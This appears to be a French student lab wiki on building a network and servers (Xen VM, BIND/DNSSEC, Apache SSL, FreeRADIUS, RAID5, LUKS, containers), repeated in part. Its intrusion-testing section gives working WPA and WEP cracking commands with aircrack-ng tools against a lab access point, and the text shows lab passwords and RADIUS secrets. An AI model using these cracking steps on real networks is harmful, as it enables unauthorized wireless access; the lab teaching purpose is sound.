Contrairement au routeur utilisé en E304, le routeur en E306 ne permet une communication que Gb. Le commutateur sera donc relié au routeur par un seul câble. En accord avec le groupe configurant le routeur et celui configurant le commutateur, on relie ces derniers par un câble ethernet du port Gigabit 0/0/2 du routeur au port 14 du commutateur.<br />
<br />
*'''Connexion Routeur ISR 4221 (E306) - Commutateur 4006 (E304) '''<br />
<br />
La connexion entre le routeur et le commutateur doit se faire par fibre étant donné que ces deux appareils se trouvent dans deux salles différentes. On utilise pour cela la fibre disponible de code couleur (A COMPLETER). Du côté de la salle E306, on connecte la fibre à l'interface Gb 0/0/1. En E304, on connecte la fibre sur un port UPLINK du commutateur.<br />
<br />
*'''Connexion Commutateur 6000 (E306) - Routeur Catalyst 3560 (E304) '''<br />
<br />
La connexion au niveau du routeur ne pouvant se faire ici que par cuivre, nous devons utiliser un convertisseur fibre - cuivre. Pour interconnecter le commutateur 6000 au routeur Catalyst 3560, nous utilisons la fibre disponible de code couleur ORANGE. On connecte alors cette fibre sur le port (A COMPLETER) du commutateur de la E306. De l'autre côté, en E304, on connecte la fibre à un convertisseur puis le convertisseur au port 11 du routeur par un câble ethernet en accord avec le groupe configurant ce routeur.<br />
<br />
===Connexions au serveur Cordouan===<br />
<br />
Finalement, il faut connecter le serveur Cordouan à notre réseau afin d'avoir du réseau sur nos futures VM. <br />
<br />
*'''Connexion Commutateur 6000 (E306) - Serveur Cordouan '''<br />
<br />
Le commutateur 6000 se trouvant dans la même salle que le serveur Cordouan, on peut relier ces derniers par cuivre. On relie alors le port 17 au serveur Cordouan par câble ethernet.<br />
<br />
*'''Connexion Routeur Catalyst 3560 (E306) - Serveur Cordouan '''<br />
<br />
Ces deux appareils se trouvant dans deux salles différentes, la connexion ne peut se faire que par fibre. Cependant, nous ne disposons plus de convertisseur. Nous avons donc relié le serveur Cordouan au routeur de la E306 plutôt qu'au commutateur. Nous avons pour cela utilisé la fibre de code couleur BLEU. Nous connectons d'un côté la fibre au deuxième port Gigabit du routeur 3560, et de l'autre, la fibre au serveur Cordouan.<br />
<br />
===Connexion des commutateurs aux points d'accès===<br />
<br />
===Schéma résumant le câblage réalisé :===<br />
<br />
[[Fichier:ArchitectureMehCret.png|1200px]]<br />
<br />
== 2.Installation des systèmes d'exploitation==<br />
<br />
===Création de la machine virtuelle===<br />
<br />
Création d'une machine virtuelle sur cordouan.insecserv.deule.net :<br />
<br />
xen-create-image --hostname=hercule --ip=193.48.57.183 --netmask=255.255.255.224 --gateway=193.48.57.160 --dir=/usr/local/xen<br />
<br />
Il fois la machine créée, on ajoute le bridge dans la config hercule.cfg<br />
<br />
vif = ['ip=193.48.57.183 , mac=#####, bridge=StudentsInfo']<br />
xen create hercule.cfg<br />
<br />
On vérifie que la machine est bien créée en s'y connectant :<br />
<br />
xl console hercule<br />
<br />
Création des partitions logiques sur Cordouan pour la machine virtuelle :<br />
lvcreate -L 10G -n /dev/virtual/hercule-home -v<br />
lvcreate -L 10G -n /dev/virtual/hercule-var -v<br />
<br />
Modification du fichier de configuration de la machine virtuelle pour prendre en compte ces volumes créés. Ajout des lignes : <br />
'phy:/dev/virtual/hercule-home,xvdb1,w',<br />
'phy:/dev/virtual/hercule-var,xvdb2,w'<br />
<br />
On relance la VM.<br />
On formate les disques créés sur la machine :<br />
mkfs -t ext4 /dev/xvdb1<br />
mkfs -t ext4 /dev/xvdb2<br />
<br />
Afin de lier le home de notre vm au disque créé précédemment, on modifie le fichier /etc/fstab en y ajoutant la ligne suivante :<br />
/dev/xvdb1 /home ext4 defaults 0 2<br />
Puis on effectue le montage :<br />
mount -a <br />
<br />
Pour le var, il faut monter temporairement le disque pour ne pas occulter le repertoire : <br />
mount /dev/xvdb2 /mnt<br />
<br />
On déplace ensuite le contenu de var dans le point de montage précédemment créé :<br />
mv /var/* /mnt<br />
<br />
Finalement, on ajoute dans le fichier /etc/fstab la ligne suivante pour effectuer le montage permanent :<br />
/dev/xvdb2 /var ext4 defaults 0 2<br />
<br />
On applique les modifications :<br />
mount -a<br />
<br />
==4.Services internet==<br />
<br />
<br />
===4.2 Serveur DNS===<br />
<br />
Achat du domaine hercule.pw sur gandi.<br />
<br />
Installation de bind9: <br />
<br />
apt install bind9 bind9-host dnsutils<br />
<br />
Modification de la configuration de bind9 :<br />
On créé un fichier de configuration de zone db.hercule.space dans /etc/bind/ avec le contenu suivant : <br />
<br />
;<br />
; BIND data file for local loopback interface<br />
;<br />
$TTL 604800<br />
@ IN SOA ns.hercule.space. root.hercule.space (<br />
3 ; Serial<br />
604800 ; Refresh<br />
86400 ; Retry<br />
2419200 ; Expire<br />
604800 ) ; Negative Cache TTL<br />
;<br />
IN NS ns.hercule.space.<br />
IN NS ns6.gandi.net<br />
@ IN A 193.48.57.183<br />
ns IN A 193.48.57.183<br />
www IN A 193.48.57.183<br />
<br />
Ajout de notre zone DNS en modifiant le fichier /etc/bind/named.conf.local :<br />
<br />
zone "hercule.space" {<br />
type master;<br />
file "/etc/bind/db.hercule.space"; <br />
allow-transfer {217.70.177.40;};<br />
};<br />
<br />
La ligne 'allow-transfer' précise les adresses des serveurs esclaves Gandi.<br />
<br />
Redémarrage du serveur bind9 :<br />
service bind9 restart<br />
<br />
Ajout de glue records sur Gandi pour permettre l'association du serveur DNS créé avec notre adresse IP : <br />
name : ns.hercule.space<br />
IP address : 193.48.57.183<br />
<br />
Changement du nameserver principal sur Gandi (A FAIRE): <br />
DNS 1 : ns.hercule.space<br />
<br />
On laisse ceux de Gandi pour les deux serveurs esclaves<br />
<br />
ZONES INVERSES A FAIRE<br />
<br />
===4.4 DNSSEC===<br />
<br />
Dans un premier temps, on active DNSSEC en ajoutant dans le fichier /etc/bind/named la ligne :<br />
dnssec-enable yes;<br />
<br />
Création d'un répertoire de nom hercule.space.dnssec pour y générer les clefs<br />
<br />
Création de la clef asymétrique de signature de clefs de zone :<br />
<br />
dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE hercule.space<br />
:<br />
Création de la clef asymétrique de la zone pour signer les enregistrements :<br />
<br />
dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE hercule.space<br />
<br />
On renomme ces clef : <br />
hercule.space-ksk.key<br />
hercule.space-zsk.key<br />
<br />
Puis on les inclus dans le fichier /etc/bind/db.hercule.space<br />
$include /etc/bind/hercule.space.dnssec/hercule.space-ksk.key<br />
$include /etc/bind/hercule.space.dnssec/hercule.space-zsk.key<br />
<br />
On signe les enregistrements de la zone :<br />
dnssec-signzone -o hercule.space -k hercule.space-ksk ../db.hercule.space hercule.space-zsk<br />
<br />
On modifie le fichier named.conf.local pour utiliser la zone signée de suffixe .signed :<br />
file "/etc/bind/db.hercule.space.signed";<br />
<br />
On communique les parties publiques de la KSK et ZSK à Gandi dans l'onglet DNSSEC. On n'oublie pas également d'incrémenter le SERIAL dans le fichier db.hercule.space.<br />
<br />
===4.3 Serveur Apache===<br />
<br />
<br />
Création du dossier /var/www/www.hercule.pw<br />
<br />
*''' Certification SSL :'''<br />
<br />
Génération du Certificate Signing Request (CSR) pour Gandi sur la VM :<br />
openssl req -nodes -newkey rsa:2048 -sha256 -keyout hercule.pw.key -out hercule.pw.csr<br />
<br />
On copie le contenu de la clé générée sur Gandi. Pour valider la certification SSL, on choisi la méthode par DNS Record. On ajoute alors l'enregistrement CNAME proposé par Gandi dans notre configuration de zone sur la VM. Il faut maintenant patienter le temps du traitement. <br />
<br />
*'''Configuration Apache :'''<br />
<br />
Configuration du serveur web dans le fichier /etc/apache2/sites-available/hercule.space.conf<br />
<br />
<VirtualHost 193.48.57.183:443><br />
ServerName www.hercule.space<br />
ServerAlias hercule.space<br />
DocumentRoot /var/www/html/<br />
CustomLog /var/log/apache2/secure_acces.log combined<br />
<br />
SSLEngine on<br />
SSLCertificateFile /etc/ssl/certs/www.hercule.space.crt<br />
SSLCertificateKeyFile /etc/ssl/private/hercule.space.key<br />
SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem<br />
SSLVerifyClient None<br />
</VirtualHost><br />
<br />
<VirtualHost 193.48.57.183:80><br />
ServerName www.hercule.space<br />
ServerAlias hercule.space<br />
Redirect / https://www.hercule.space<br />
</VirtualHost><br />
<br />
<br />
Modification du fichier ports.conf pour que le serveur web écoute sur le port 443 :<br />
<br />
Listen 80 443<br />
<br />
On active enfin le module SSL, notre site, et on redémarre le service apache :<br />
a2enmod ssl<br />
a2ensite hercule.space.conf<br />
service apache2 restart<br />
<br />
===Serveur Freeradius===<br />
<br />
Installation de Freeradius sur la vm :<br />
apt-get install freeradius<br />
<br />
On ajoute ensuite un utilisateur au serveur freeradius. Pour cela, dans le fichier /etc/freeradius/3.0/users on ajoute : <br />
hercule Cleartext-Password := "glopglop"<br />
<br />
Il nous est demandé de configurer le serveur en PEAP-MSCHAPv2. Pour cela, on modifie les fichiers : <br />
<br />
- /etc/freeradius/3.0/mods-enabled/eap :<br />
default_eap_type = peap<br />
<br />
- /etc/freeradius/3.0/mods-enabled/mschap :<br />
use_mppe = yes<br />
require_encryption = yes<br />
require_strong = yes<br />
with_ntdomain_hack = yes<br />
<br />
<br />
On ajoute les points d'accès dans notre configuration de serveur (fichier : /etc/freeradius/3.0/clients.conf) :<br />
client 192.168.0.10/32 <br />
{<br />
secret = secretIMA5SC<br />
shortname = borneDivinite<br />
}<br />
<br />
client 192.168.0.11/32 <br />
{<br />
secret = secretIMA5SC<br />
shortname = borneDivinite<br />
}<br />
<br />
<br />
On met à jour la configuration : <br />
ldconfig<br />
<br />
Et enfin, nous lançons le service freeradius :<br />
$ service freeradius restart<br />
<br />
Nous passons ensuite à la modification de la configuration des points d'accès afin qu'ils prennent en compte notre serveur freeradius :<br />
<br />
enable<br />
<br />
conf t<br />
aaa new-model<br />
aaa authentication login eap_group17 group radius_group17<br />
aaa group server radius radius_group17<br />
server 193.48.57.183 auth-port 1812 acct-port 1813<br />
radius-server host 193.48.57.183 auth-port 1812 acct-port 1813 key secretIMA5SC<br />
end<br />
<br />
conf t<br />
dot11 ssid Hercule<br />
vlan 17<br />
authentication open eap eap_group17<br />
authentication network-eap eap_group17<br />
authentication key-management wpa<br />
Mbssid Guest-mode<br />
end<br />
<br />
conf t<br />
int dot11radio0<br />
Mbssid<br />
ssid Hercule<br />
encryption vlan 17 mode ciphers aes-ccm tkip<br />
end<br />
<br />
conf t<br />
int dot11radio0.17<br />
encapsulation dot1Q 17<br />
bridge-group 17<br />
end<br />
<br />
== 5. Tests d'intrusion ==<br />
===5.3 Crackage de clé WPA===<br />
<br />
Afin de lancer le crackage de clé WPA sur le point d'accès cracotte07, nous avons besoin du package aircrack-ng que nous installons. Nous affichons ainsi nos interfaces avec la commande :<br />
<br />
$ iwconfig<br />
<br />
Nous lançons alors airmon-ng avec notre interface wifi pour la mettre en mode moniteur:<br />
<br />
$ airmon-ng start wlp2s0<br />
<br />
Nous affichons ensuite tout les point d'accés environnants en utilisant la commande :<br />
<br />
$ airodump-ng wlp2s0mon<br />
<br />
Nous capturons des paquets provenants de cracotte07 que nous enregistrons dans un fichier :<br />
<br />
$ airodump-ng -c 9 --bssid 04:DA:d2:9C:50:56 -w ./path_to_folder/cracotte07 wlp2s0mon<br />
<br />
Une fois les fichiers générés, nous les transférons sur une ZABETH. Avant de lancer le craquage, nous devons générer un dictionnaire contenant toutes les combinaisons possibles de 8 chiffres. Pour cela, nous réalisons le script bash suivant :<br />
<br />
#!/bin/bash<br />
charset=({0..9})<br />
permute(){<br />
(($1 == 0)) && { echo "$2"; return; }<br />
for char in "${charset[@]}"<br />
do<br />
permute "$((${1} - 1 ))" "$2$char"<br />
done<br />
}<br />
permute "$1"<br />
<br />
Que nous laçons en exécutant :<br />
<br />
$ ./comb.sh 8 >> dictionnaire.txt<br />
<br />
Le crack est effectué en lançant la commande :<br />
<br />
$ aircrack-ng -a2 -b 04:DA:D2:9C:50:56 -w /path_to_file/dictionnaire.txt /path_to_file/*.cap<br />
<br />
Nous récupérons la clé après quelques heures de calcul :<br />
<br />
[[Fichier:Crack groupe7.png|600px]]<br />
<br />
===5.2 Cassage de clé WEP===<br />
<br />
<br />
Nous affichons ainsi nos interfaces avec la commande :<br />
<br />
$ iwconfig<br />
<br />
Nous lançons alors airmon-ng avec notre interface wifi pour la mettre en mode moniteur:<br />
<br />
$ airmon-ng start wlx40a5ef012c92<br />
<br />
Nous affichons ensuite tout les point d'accés environnants protégés en WEP en utilisant la commande :<br />
<br />
$ airodump-ng --encrypt wep wlan0mon<br />
<br />
Nous capturons des paquets provenants de cracotte07 que nous enregistrons dans un fichier :<br />
<br />
$ airodump-ng --channel 9 --bssid 04:DA:d2:9C:50:56 -w ./path_to_folder/cracotte07 wlan0mon<br />
<br />
En parallèle, on simule une connexion au point d'accès pour récupérer le handshake : <br />
$ aireplay-ng --fakeauth 30 -a 04:DA:D2:9C:50:56 wlan0mon<br />
<br />
On réalise le cassage : <br />
$ aircrack-ng ./path_to_folder/cracotte07.cap<br />
<br />
<br />
<br />
[[Fichier:cassagewep07.png|600px]]<br />
<br />
== 6. Réalisation ==<br />
<br />
===6.1 Sécurisation de données===<br />
<br />
Création de trois partitions LVM de 1Go sur Cordouan : <br />
lvcreate -L 1G -n /dev/virtual/hercule1 -v<br />
lvcreate -L 1G -n /dev/virtual/hercule2 -v<br />
lvcreate -L 1G -n /dev/virtual/hercule3 -v<br />
<br />
Modification du fichier de configuration de la machine virtuelle pour prendre en compte ces volumes créés. Ajout des lignes :<br />
<br />
'phy:/dev/virtual/hercule1,xvdc1,w',<br />
'phy:/dev/virtual/hercule2,xvdc2,w',<br />
'phy:/dev/virtual/hercule3,xvdc3,w'<br />
<br />
<br />
Installation du paquetage mdadm pour réaliser le RAID5 logiciel :<br />
apt-get install mdadm<br />
<br />
Création du RAID5 :<br />
mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdc1 /dev/xvdc2 /dev/xvdc3<br />
<br />
On formate le RAID créé : <br />
mkfs -t ext4 /dev/md0<br />
<br />
On monte le RAID dans notre VM : <br />
mount /dev/md0 /mnt <br />
<br />
On créé un fichier sur le RAID pour qu'il contienne des données. On ferme la VM et on lui retire la partition xvdc3 dans sa config.<br />
On relance la VM. Puis on essaye de remonter le RAID : <br />
En voulant remonter /dev/md0, un message nous indique que md0 n'existe pas. On lance alors la commande : <br />
cat /proc/mdstat<br />
Et on s'aperçoit que notre RAID est toujours présent, cette fois n'ayant plus que deux disques, mais apparaît sous le nom md127. On monte alors ce derrnier : <br />
mount /dev/md127 /mnt<br />
On retrouve alors bien le fichier créé initialement sur notre RAID. Lors de sa création, le fichier a été copié sur les 3 disques par le RAID. Ainsi, lorsque que nous avons supprimé un disque, cela n'a pas eu d'impact sur nos données.<br />
<br />
[[Fichier:Raidhercule.png|600px]]<br />
<br />
===6.2 Cryptage de données===<br />
<br />
Dans notre cas, nous n'utilisons pas une carte SD. Nous créons cependant une partition de 1 Giga sur cordouan sur laquelle on travaillera :<br />
<br />
$ lvcreate -L 1G -n /dev/virtual/hercule-crypt -v<br />
<br />
Une fois cette action réalisée, et la partition intégrée au fichier de configuration de la machine virtuelle sous forme de volume, de nom xvdd1, nous récupérons les paquets lvm2 et cryptsetup.<br />
Lorsque la récupération est terminée, nous sécurisons la partition de la manière suivante :<br />
<br />
$ cryptsetup luksFormat -c aes -h sha256 /dev/xvdd1<br />
<br />
Cette commande permet de formater la partiton au type LUKS et chiffre en AES avec un algorithme de hashage SHA256. Nous choisissons une phrase de chiffrement.<br />
<br />
Une fois la partition chiffrée, nous ouvrons un volume dans notre partition chiffrée :<br />
<br />
$ cryptsetup luksOpen /dev/xvdd1 home<br />
<br />
Nous la formatons en ext4 :<br />
<br />
$ mkfs -t ext4 /dev/mapper/home<br />
<br />
Enfin, nous montons la partition sous /mnt :<br />
<br />
$ mount -t ext4 /dev/mapper/home /mnt<br />
<br />
Nous y créons ensuite un fichier texte. La suite de cette partie, qui est d'échanger les cartes SD, n'est pas réalisable dans notre cas.</div>Mcreteurhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G7&diff=49129TP sysres IMA5sc 2018/2019 G72018-12-21T18:02:31Z<p>Mcreteur : /* 5. Tests d'intrusion */</p>
<hr />
<div>= Wiki de TP =<br />
<br />
=TP GIS=<br />
<br />
==Conteneurs "à la main"==<br />
<br />
===Mise en place des conteneurs===<br />
<br />
*'''Création d'une partition''':<br />
dd if=/dev/zero of=/disk1 bs=1024K count=10240<br />
<br />
*'''Formatage''' : <br />
mtfs.etx4 /disk1<br />
<br />
*'''Montage de la partition''':<br />
mount /disk1 /mnt<br />
<br />
*'''Installation d'un système Debian''':<br />
debootstrap --include=apache2,nano stable /mnt <br />
<br />
*'''Préparation du montage du pseudo système de fichier /proc''':<br />
echo "proc /proc proc defaults 0 0" >> rootfs/etc/fstab<br />
<br />
*''' Démontage ''':<br />
umount /mnt<br />
<br />
*'''Copie en 2 exemplaires''':<br />
cp /disk1 /disk2<br />
cp /disk1 /disk3<br />
<br />
*'''Montage des 3 partitions :'''<br />
mount -oloop /disk1 /mnt/dsk1<br />
mount -oloop /disk2 /mnt/dsk2<br />
mount -oloop /disk3 /mnt/dsk3<br />
<br />
*'''Création du processus isolé par unshare''':<br />
unshare -p -f -m -n -u chroot /mnt/dsk1 /bin/sh -c "mount /proc ; /bin/bash"<br />
unshare -p -f -m -n -u chroot /mnt/dsk2 /bin/sh -c "mount /proc ; /bin/bash"<br />
unshare -p -f -m -n -u chroot /mnt/dsk3 /bin/sh -c "mount /proc ; /bin/bash"<br />
<br />
===Configuration réseau===<br />
*'''Création d'un commutateur logiciel''':<br />
ip link add mehcret2 type bridge<br />
<br />
*'''Création des interfaces virtuelles:'''<br />
ip link add vif1 type veth peer name eth0@vif1<br />
ip link add vif2 type veth peer name eth0@vif2<br />
ip link add vif3 type veth peer name eth0@vif3<br />
ip link add vif4 type veth peer name eth1@vif4<br />
<br />
*'''Ajout d'interfaces dans le commutateur :'''<br />
ip link set vif1 master mehcret2<br />
ip link set vif2 master mehcret2<br />
ip link set vif3 master mehcret2<br />
ip link set vif4 master bridge<br />
<br />
*'''Activation des interfaces''':<br />
ip link set eth0 up<br />
ip link set eth1 up<br />
<br />
*'''Récupération du PID des conteneurs :'''<br />
ps auxwww | grep unshare<br />
<br />
*'''Ajout des interfaces dans les conteneurs :'''<br />
ip link set eth0@vif2 netns /proc/19382/ns/net name eth0 (dsk1)<br />
ip link set eth0@vif1 netns /proc/19377/ns/net name eth0 (dsk2)<br />
ip link set eth1@vif4 netns /proc/19377/ns/net name eth1 (dsk2)<br />
ip link set eth0@vif3 netns /proc/19396/ns/net name eth0 (dsk3)<br />
<br />
*'''Activation du pont:''' <br />
ip address add dev mehcret2 192.168.60.0/24<br />
<br />
*'''Attribution des adresses:'''<br />
ip address add dev eth0 192.168.60.51/24 (dsk1)<br />
ip address add dev eth0 192.168.60.52/24 (dsk2)<br />
ip address add dev eth0 192.168.60.53/24 (dsk3)<br />
ip address add dev eth1 172.26.145.67/24 (dsk2)<br />
ip route add default via 172.26.145.254 (dsk2)<br />
<br />
*'''Activation :'''<br />
ip link set eth0 up<br />
ip link set vif1 up<br />
ip link set vif2 up<br />
ip link set vif3 up<br />
ip link set vif4 up<br />
ip link set mehcret2 up<br />
<br />
On peut désormais pinger entre les différents conteneurs.<br />
<br />
===Configuration des serveurs Web===<br />
<br />
Nous devons maintenant mettre en place les serveurs apache.<br />
<br />
Dans un premier temps, on créé les sous-domaines dont nous avons besoin. Dans les enregistrements DNS du domaine '''plil.space''', on ajoute les enregistrements suivants : <br />
<br />
- mndtMehcret A 172.26.145.67 (mndtMehcret sera le serveur mandataire. On le fait pointer sur l'adresse eth1 du conteneur 2)<br />
<br />
- web1Mehcret CNAME mndtMehcret (Serveur web du conteneur 1)<br />
<br />
- web2Mehcret CNAME mndtMhecret (Serveur web du conteneur 3)<br />
<br />
On configure ensuite les serveurs Apache. On attribue au premier serveur sur le conteneur 1 la configuration suivante dans le répertoire /etc/apache2/sites-available/ :<br />
<br />
<VirtualHost *:80><br />
ServerName web1mehcret.plil.space<br />
Options Indexes FollowSymLinks<br />
DocumentRoot /var/www/html/web1mehcret/<br />
</VirtualHost> <br />
<br />
On fait de même dans le conteneur 3 pour le serveur 2 en mettant les ServerName et Document root associés.<br />
On écrit ensuite une page HTML basique dans les dossiers /var/www/html/web1mehcret/ et /var/www/html/web2mehcret/ afin de reconnaître notre serveur web. <br />
<br />
Il faut maintenant mettre en place le reverse proxy. <br />
Dans le conteneur 2, connectée à la fois à eth0 et eth1, nous mettons en place la configuration suivante :<br />
<br />
<VirtualHost *:80><br />
ServerName mndtMehcret.plil.space<br />
ProxyPass "/web1" "http://192.168.60.51/"<br />
ProxyPassReverse "/web1" "http://192.168.60.51/"<br />
ProxyPass "/web2" "http://"http://192.168.60.53/"<br />
ProxyPassReverse "/web2" "http://192.168.60.53/"<br />
</VirtualHost><br />
<br />
Les lignes ProxyPass et ProxyPassReverse permettent alors la redirection sur les serveurs web du conteneur 1 et 3.<br />
<br />
Après avoir configuré les différents serveurs Apache, il faut redémarrer les services sur chaque conteneur :<br />
<br />
$ service apache2 restart<br />
<br />
Pour utiliser apache en mode reverse proxy, on execute la commande :<br />
<br />
$ a2enmod proxy proxy_http<br />
<br />
11h25 : Serveurs Web unshare OK<br />
<br />
==Conteneurs Docker==<br />
<br />
Avant de lancer un conteneur, il faut modifier le fichier /etc/default/docker et commenter la ligne contenant iptables.<br />
Nous exécutons ensuite la commande :<br />
$ iptables-save<br />
Puis on redémarre le service Docker :<br />
$ service docker restart<br />
<br />
Sans les commandes réalisées précédemment, nous n'avions pas accès au réseau dans les conteneurs.<br />
<br />
Nous pouvons maintenant lancer un conteneur basé sur l'image officielle de debian :<br />
$ docker run -i -t debian<br />
<br />
Dans le conteneur, nous ajoutons le proxy de l'école :<br />
$ export http_proxy=http://proxy.polytech-lille.fr:3128/ <br />
<br />
Nous pouvons maintenant utiliser le gestionnaire de paquets apt afin d'installer apache2 et un éditeur de texte:<br />
$ apt-get update<br />
$ apt-get install apache2, nano, vim<br />
<br />
On sauvegarde ensuite le conteneur pour pouvoir le lancer plus tard en 3 exemplaires : <br />
<br />
$ docker commit [IDduConteneur] mehcret<br />
<br />
On créé un réseau Docker pour isoler nos conteneurs ensemble :<br />
<br />
$ docker network create --driver bridge mehcretnetwork<br />
<br />
Nous lançons ensuite 3 conteneurs sur le réseau précédemment créé en liant le port 80 du conteneur 3 (qui jouera le rôle de reverse proxy) au port 80 de la machine : <br />
<br />
$ docker run -i --network mehcretnetwork --name mehcret1 mehcret<br />
$ docker run -i --network mehcretnetwork --name mehcret2 mehcret<br />
$ docker run -i --network mehcretnetwork --name mehcret3 -p 80:80 mehcret<br />
<br />
Nous créons un nouveau sous domaine, dockerMehcret.plil.space pointant sur l'adresse IP de notre bridge en ajoutant un enregistrement de type A.<br />
Finalement, on configure les différents serveurs Apache comme nous l'avions fait dans la partie précédente.<br />
<br />
<br />
10h30 Serveurs Web (docker) OK<br />
<br />
<br />
=TP PRA=<br />
<br />
Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système nous aurons à installer une machine virtuelle Xen ainsi qu’à implanter un auto-commutateur téléphonique logiciel. Enfin la mise en place d’un réseau Wifi sécurisé et d’un site web sécurisé nous permettra de mettre en pratiques nos connaissances en la matière.<br />
<br />
==Tâche 5 : Câblage, connexion SR52, cordouan==<br />
<br />
===Connexion des routeurs au réseau de l'école===<br />
<br />
*'''Connexion SR52 - Routeur ISR4221 (E306)'''<br />
<br />
Dans le local SR52, on branche un câble du port 21 du routeur jusqu'au port K-16 du commutateur qui est relié à la prise murale qui se situe au dessus de cordouan en E306.<br />
<br />
Sur le routeur, on passe le port 21 sur le vlan 131 : <br />
<br />
config t<br />
int gi1/0/21<br />
switchport access vlan 131<br />
write<br />
<br />
En E306, on relie le port Gigabit 0/0/0 du routeur ISR4221 à la prise murale SR52.3-K16.<br />
<br />
Les LEDs passent alors au vert et on observe que le port 21 du routeur en SR52 est bien connecté :<br />
<br />
<br />
<gallery mode="nolines" widths=500px heights=400px><br />
<br />
File:TableVlansInterfacesSR52.jpg<br />
<br />
File:LedSR52.jpg<br />
<br />
<br />
</gallery><br />
<br />
*'''Connexion SR52 - Routeur Catalyst 3560 (E304)'''<br />
<br />
En E304, on remarque une fibre libre de code couleur Blanc-Noir, on retrouve cette même fibre connectée au routeur en SR52 sur une interface 10Gb et déjà configurée sur le bon Vlan. On branche alors cette fibre sur la première interface 10 Gb du routeur Catalyst 3560 en E304 en accord avec le groupe configurant ce routeur. Le routeur de la E304 est désormais connecté au réseau de l'école.<br />
<br />
<br />
===Connexion des commutateurs aux routeurs===<br />
<br />
*'''Connexion Routeur Catalyst 3560 - Commutateur 4006 (E304)'''<br />
<br />
Le routeur utilisé en E304 permettant la communication 10Gb, on relie le commutateur au routeur par 10 câbles afin de profiter au maximum des possibilités offertes par le Catalyst 3560. Le groupe s'occupant des commutateurs ayant configuré le commutateur de la E304 pour communiquer avec le routeur de cette même salle par les ports 4 à 13, on branche 10 câbles ethernet sur ces ports que l'on relie au routeur sur les ports 1 à 10.<br />
<br />
*'''Connexion Routeur ISR 4221 - Commutateur 6000 (E306)'''<br />
<br />
Contrairement au routeur utilisé en E304, le routeur en E306 ne permet une communication que Gb. Le commutateur sera donc relié au routeur par un seul câble. En accord avec le groupe configurant le routeur et celui configurant le commutateur, on relie ces derniers par un câble ethernet du port Gigabit 0/0/2 du routeur au port 14 du commutateur.<br />
<br />
*'''Connexion Routeur ISR 4221 (E306) - Commutateur 4006 (E304) '''<br />
<br />
La connexion entre le routeur et le commutateur doit se faire par fibre étant donné que ces deux appareils se trouvent dans deux salles différentes. On utilise pour cela la fibre disponible de code couleur (A COMPLETER). Du côté de la salle E306, on connecte la fibre à l'interface Gb 0/0/1. En E304, on connecte la fibre sur un port UPLINK du commutateur.<br />
<br />
*'''Connexion Commutateur 6000 (E306) - Routeur Catalyst 3560 (E304) '''<br />
<br />
La connexion au niveau du routeur ne pouvant se faire ici que par cuivre, nous devons utiliser un convertisseur fibre - cuivre. Pour interconnecter le commutateur 6000 au routeur Catalyst 3560, nous utilisons la fibre disponible de code couleur ORANGE. On connecte alors cette fibre sur le port (A COMPLETER) du commutateur de la E306. De l'autre côté, en E304, on connecte la fibre à un convertisseur puis le convertisseur au port 11 du routeur par un câble ethernet en accord avec le groupe configurant ce routeur.<br />
<br />
===Connexions au serveur Cordouan===<br />
<br />
Finalement, il faut connecter le serveur Cordouan à notre réseau afin d'avoir du réseau sur nos futures VM. <br />
<br />
*'''Connexion Commutateur 6000 (E306) - Serveur Cordouan '''<br />
<br />
Le commutateur 6000 se trouvant dans la même salle que le serveur Cordouan, on peut relier ces derniers par cuivre. On relie alors le port 17 au serveur Cordouan par câble ethernet.<br />
<br />
*'''Connexion Routeur Catalyst 3560 (E306) - Serveur Cordouan '''<br />
<br />
Ces deux appareils se trouvant dans deux salles différentes, la connexion ne peut se faire que par fibre. Cependant, nous ne disposons plus de convertisseur. Nous avons donc relié le serveur Cordouan au routeur de la E306 plutôt qu'au commutateur. Nous avons pour cela utilisé la fibre de code couleur BLEU. Nous connectons d'un côté la fibre au deuxième port Gigabit du routeur 3560, et de l'autre, la fibre au serveur Cordouan.<br />
<br />
===Connexion des commutateurs aux points d'accès===<br />
<br />
===Schéma résumant le câblage réalisé :===<br />
<br />
[[Fichier:ArchitectureMehCret.png|1200px]]<br />
<br />
== 2.Installation des systèmes d'exploitation==<br />
<br />
===Création de la machine virtuelle===<br />
<br />
Création d'une machine virtuelle sur cordouan.insecserv.deule.net :<br />
<br />
xen-create-image --hostname=hercule --ip=193.48.57.183 --netmask=255.255.255.224 --gateway=193.48.57.160 --dir=/usr/local/xen<br />
<br />
Il fois la machine créée, on ajoute le bridge dans la config hercule.cfg<br />
<br />
vif = ['ip=193.48.57.183 , mac=#####, bridge=StudentsInfo']<br />
xen create hercule.cfg<br />
<br />
On vérifie que la machine est bien créée en s'y connectant :<br />
<br />
xl console hercule<br />
<br />
Création des partitions logiques sur Cordouan pour la machine virtuelle :<br />
lvcreate -L 10G -n /dev/virtual/hercule-home -v<br />
lvcreate -L 10G -n /dev/virtual/hercule-var -v<br />
<br />
Modification du fichier de configuration de la machine virtuelle pour prendre en compte ces volumes créés. Ajout des lignes : <br />
'phy:/dev/virtual/hercule-home,xvdb1,w',<br />
'phy:/dev/virtual/hercule-var,xvdb2,w'<br />
<br />
On relance la VM.<br />
On formate les disques créés sur la machine :<br />
mkfs -t ext4 /dev/xvdb1<br />
mkfs -t ext4 /dev/xvdb2<br />
<br />
Afin de lier le home de notre vm au disque créé précédemment, on modifie le fichier /etc/fstab en y ajoutant la ligne suivante :<br />
/dev/xvdb1 /home ext4 defaults 0 2<br />
Puis on effectue le montage :<br />
mount -a <br />
<br />
Pour le var, il faut monter temporairement le disque pour ne pas occulter le repertoire : <br />
mount /dev/xvdb2 /mnt<br />
<br />
On déplace ensuite le contenu de var dans le point de montage précédemment créé :<br />
mv /var/* /mnt<br />
<br />
Finalement, on ajoute dans le fichier /etc/fstab la ligne suivante pour effectuer le montage permanent :<br />
/dev/xvdb2 /var ext4 defaults 0 2<br />
<br />
On applique les modifications :<br />
mount -a<br />
<br />
==4.Services internet==<br />
<br />
<br />
===Serveur DNS===<br />
<br />
Achat du domaine hercule.pw sur gandi.<br />
<br />
Installation de bind9: <br />
<br />
apt install bind9 bind9-host dnsutils<br />
<br />
Modification de la configuration de bind9 :<br />
